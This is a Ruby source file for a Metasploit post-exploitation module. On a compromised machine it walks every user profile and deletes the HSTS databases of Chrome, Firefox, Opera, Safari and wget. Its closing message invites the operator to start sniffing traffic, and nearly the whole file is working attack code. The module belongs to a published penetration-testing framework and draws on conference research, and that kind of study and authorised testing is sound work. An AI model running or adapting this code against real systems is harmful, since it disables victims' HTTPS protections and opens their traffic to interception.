metasploit-framework/modules/post/multi/manage/hsts_eraser.rb

131 lines
4.7 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
include Msf::Post::File
include Msf::Post::Windows::UserProfiles
include Msf::Post::OSX::System
include Msf::Post::Unix
def initialize(info = {})
super(update_info(info,
'Name' => 'Web browsers HSTS entries eraser',
'Description' => %q{
This module removes the HSTS database of the following tools and web browsers: Mozilla Firefox,
Google Chrome, Opera, Safari and wget.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Sheila A. Berta (UnaPibaGeek)', # ElevenPaths
],
'Platform' => %w(linux osx unix win),
'Arch' => [ARCH_X86,ARCH_X64],
'References' =>
[
[ 'URL', 'http://blog.en.elevenpaths.com/2017/12/breaking-out-hsts-and-hpkp-on-firefox.html' ],
[ 'URL', 'https://www.blackhat.com/docs/eu-17/materials/eu-17-Berta-Breaking-Out-HSTS-And-HPKP-On-Firefox-IE-Edge-And-Possibly-Chrome.pdf' ]
],
'SessionTypes' => %w(meterpreter shell)
))
register_options([
OptBool.new('DISCLAIMER',
[true, 'This module will delete HSTS data from the target. Set this parameter to True in order to accept this warning.', false])
])
end
def run
unless (datastore['DISCLAIMER'] == true)
print_error("This module will delete HSTS data from all browsers on the target. You must set the DISCLAIMER option to True to acknowledge that you understand this warning.")
return
end
profiles = user_profiles
profiles.each do |user_profile|
account = user_profile['UserName']
browsers_hsts_db_path = {}
case session.platform
when 'windows'
browsers_hsts_db_path = {
'Chrome' => "#{user_profile['LocalAppData']}\\Google\\Chrome\\User Data\\Default\\TransportSecurity",
'Firefox' => "#{user_profile['AppData']}\\Mozilla\\Firefox\\Profiles", #Just path for now
'Opera' => "#{user_profile['AppData']}\\Opera Software\\Opera Stable\\TransportSecurity"
}
when 'unix', 'linux'
browsers_hsts_db_path = {
'Chrome' => "#{user_profile['LocalAppData']}/.config/google-chrome/Default/TransportSecurity",
'Firefox' => "#{user_profile['LocalAppData']}/.mozilla/firefox", #Just path for now
'Opera' => "#{user_profile['LocalAppData']}/.config/opera/TransportSecurity",
'wget' => "#{user_profile['LocalAppData']}/.wget-hsts"
}
when 'osx'
browsers_hsts_db_path = {
'Chrome' => "#{user_profile['LocalAppData']}/Google/Chrome/Default/TransportSecurity",
'Firefox' => "#{user_profile['LocalAppData']}/Firefox/Profiles", #Just path for now
'Opera' => "#{user_profile['LocalAppData']}/com.operasoftware.Opera/TransportSecurity",
'Safari' => "#{user_profile['AppData']}/Cookies/HSTS.plist"
}
else
print_error "Platform not recognized: #{session.platform}"
end
browsers_hsts_db_path.each_pair do |browser, path|
if browser == 'Firefox'
hsts_db_path = []
if directory?(path)
files = dir(path)
files.reject! { |file| %w(. ..).include?(file) }
files.each do |file_path|
hsts_db_path.push([path, file_path, 'SiteSecurityServiceState.txt'].join(system_separator)) if file_path.match(/.*\.default/)
end
end
path = hsts_db_path[0]
end
if !path.nil? and file?(path)
print_status "Removing #{browser} HSTS database for #{account}... "
file_rm(path)
end
end
end
print_status "HSTS databases removed! Now enjoy your favorite sniffer! ;-)"
end
def user_profiles
user_profiles = []
case session.platform
when /unix|linux/
user_names = dir("/home")
user_names.reject! { |u| %w(. ..).include?(u) }
user_names.each do |user_name|
user_profiles.push('UserName' => user_name, "LocalAppData" => "/home/#{user_name}")
end
when /osx/
user_names = session.shell_command("ls /Users").split
user_names.reject! { |u| u == 'Shared' }
user_names.each do |user_name|
user_profiles.push(
'UserName' => user_name,
"AppData" => "/Users/#{user_name}/Library",
"LocalAppData" => "/Users/#{user_name}/Library/Application Support"
)
end
when /windows/
user_profiles |= grab_user_profiles
else
print_error "Error getting user profile data!"
end
user_profiles
end
def system_separator
return session.platform == 'windows' ? '\\' : '/'
end
end